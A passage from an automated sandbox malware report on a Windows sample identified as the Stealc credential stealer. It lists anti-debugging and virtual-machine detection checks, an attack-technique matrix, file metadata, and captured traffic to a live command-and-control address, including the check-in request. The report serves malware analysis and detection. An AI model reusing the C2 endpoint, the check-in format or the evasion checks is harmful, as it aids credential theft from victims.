              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01001269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_01001269
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FFDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00FFDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0100DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_0100DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0100D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_0100D530
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FF16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00FF16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FF16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00FF16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01011BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,1_2_01011BF0
              Source: file.exe, file.exe, 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000001.00000002.1389602747.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1389602747.0000000000D95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000001.00000002.1389602747.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25721
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25585
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-25714
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00FF4A60 VirtualProtect 00000000,00000004,00000100,?1_2_00FF4A60
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01016390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_01016390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01016390 mov eax, dword ptr fs:[00000030h]1_2_01016390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01012A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_01012A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7708, type: MEMORYSTR
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01014610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,1_2_01014610
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_010146A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,1_2_010146A0
              Source: file.exe, file.exe, 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: C(Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_01012D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01011B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,1_2_01011B20
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01012A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_01012A40
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01012C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,1_2_01012C10

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1330851446.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1389602747.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7708, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1330851446.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1389602747.0000000000D6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7708, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter
              1
              Create Account
              11
              Process Injection
              1
              Masquerading
              OS Credential Dumping2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              2
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              33
              Virtualization/Sandbox Evasion
              LSASS Memory641
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools
              Security Account Manager33
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection
              NTDS13
              Process Discovery
              Distributed Component Object ModelInput Capture12
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets1
              Account Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
              Obfuscated Files or Information
              Cached Domain Credentials1
              System Owner/User Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing
              DCSync1
              File and Directory Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc Filesystem324
              System Information Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe39%ReversingLabsWin32.Trojan.Generic
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.phpft100%Avira URL Cloudmalware
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                high
                http://185.215.113.206/false
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/c4becf79229cb002.php?file.exe, 00000001.00000002.1389602747.0000000000D95000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://185.215.113.206/c4becf79229cb002.phpftfile.exe, 00000001.00000002.1389602747.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://185.215.113.206file.exe, 00000001.00000002.1389602747.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://185.215.113.206/;file.exe, 00000001.00000002.1389602747.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://185.215.113.206/c4becf79229cb002.phpcfile.exe, 00000001.00000002.1389602747.0000000000D95000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://185.215.113.206/Xfile.exe, 00000001.00000002.1389602747.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://185.215.113.206/c4becf79229cb002.phpwfile.exe, 00000001.00000002.1389602747.0000000000D95000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.206
                              unknownPortugal
                              206894WHOLESALECONNECTIONSNLtrue
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1559392
                              Start date and time:2024-11-20 13:26:09 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 27s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 79%
                              • Number of executed functions: 18
                              • Number of non-executed functions: 117
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe
                              No simulations
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.206file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadeyBrowse
                              • 185.215.113.43
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousAmadeyBrowse
                              • 185.215.113.43
                              file.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206
                              No context
                              No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.945386727584341
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'774'080 bytes
                              MD5:d1f75fb0b0afd1ea41c2dccd9c3d2427
                              SHA1:6fdb92b4b415d69584ea1844ec2eed9f068f9640
                              SHA256:3eee56925a00f1e0162ec92e9e2cb827a2977a229aa8e6e303d24849ae6d6469
                              SHA512:0cdac8c2b9508edc06b27065b692d2268fa62949cb7813ae36f168f1ac7bd88c6cae3e2e121e42aec064681ffe387ab9757285c45b0008f19f8c0b5d9047eea4
                              SSDEEP:49152:z5aFRvsfImgaY2RKIZE1dW5e00M8IfhF:z5aMfIm1+wE+52Mj
                              TLSH:2A8533E435036AE6C12EDAFC65FCB655F3B9D1C0A4E46C334258AF370483D88E57AA46
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0xa82000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                              Instruction
                              jmp 00007F76D8E0109Ah
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x1ac.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x2490000x16200733c87cfa3669fdf28823e1a35c00846unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x24a0000x1ac0x2008b4456ef886919e03a5fd6b3f7311675False0.580078125data4.541827202327633IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x24c0000x29d0000x2007b2d37d61980e0b633f1d272aab4d74dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              yuaygcvc0x4e90000x1980000x1974007401c1a0419d71b95691c17074a1aeaeFalse0.9945434795119705data7.953931532068962IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              tibvwtje0x6810000x10000x40007e9b161592cd4c6b2d5daa12ec60ebdFalse0.79296875data6.2723607016152325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x6820000x30000x220006b8e76d94d9c4f0bcdeb5730f5187fdFalse0.06330422794117647DOS executable (COM)0.7790019605752105IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_MANIFEST0x6800d80x152ASCII text, with CRLF line terminators0.6479289940828402
                              DLLImport
                              kernel32.dlllstrcpy
                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-11-20T13:27:19.578027+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749731185.215.113.20680TCP
                              TimestampSource PortDest PortSource IPDest IP
                              Nov 20, 2024 13:27:18.343779087 CET4973180192.168.2.7185.215.113.206
                              Nov 20, 2024 13:27:18.645263910 CET8049731185.215.113.206192.168.2.7
                              Nov 20, 2024 13:27:18.645351887 CET4973180192.168.2.7185.215.113.206
                              Nov 20, 2024 13:27:18.649369001 CET4973180192.168.2.7185.215.113.206
                              Nov 20, 2024 13:27:18.655260086 CET8049731185.215.113.206192.168.2.7
                              Nov 20, 2024 13:27:19.349715948 CET8049731185.215.113.206192.168.2.7
                              Nov 20, 2024 13:27:19.349893093 CET4973180192.168.2.7185.215.113.206
                              Nov 20, 2024 13:27:19.353347063 CET4973180192.168.2.7185.215.113.206
                              Nov 20, 2024 13:27:19.358207941 CET8049731185.215.113.206192.168.2.7
                              Nov 20, 2024 13:27:19.577837944 CET8049731185.215.113.206192.168.2.7
                              Nov 20, 2024 13:27:19.578027010 CET4973180192.168.2.7185.215.113.206
                              Nov 20, 2024 13:27:22.588435888 CET4973180192.168.2.7185.215.113.206
                              • 185.215.113.206
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.749731185.215.113.206807708C:\Users\user\Desktop\file.exe
                              TimestampBytes transferredDirectionData
                              Nov 20, 2024 13:27:18.649369001 CET90OUTGET / HTTP/1.1
                              Host: 185.215.113.206
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Nov 20, 2024 13:27:19.349715948 CET203INHTTP/1.1 200 OK
                              Date: Wed, 20 Nov 2024 12:27:19 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Nov 20, 2024 13:27:19.353347063 CET412OUTPOST /c4becf79229cb002.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHI
                              Host: 185.215.113.206
                              Content-Length: 210
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 36 37 46 33 46 35 37 41 38 36 43 31 31 38 30 30 38 36 39 32 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a
                              Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="hwid"167F3F57A86C118008692------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="build"mars------DGHJECAFIDAFHJKFCGHI--
                              Nov 20, 2024 13:27:19.577837944 CET210INHTTP/1.1 200 OK
                              Date: Wed, 20 Nov 2024 12:27:19 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Target ID:1
                              Start time:07:27:13
                              Start date:20/11/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0xff0000
                              File size:1'774'080 bytes
                              MD5 hash:D1F75FB0B0AFD1EA41C2DCCD9C3D2427
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
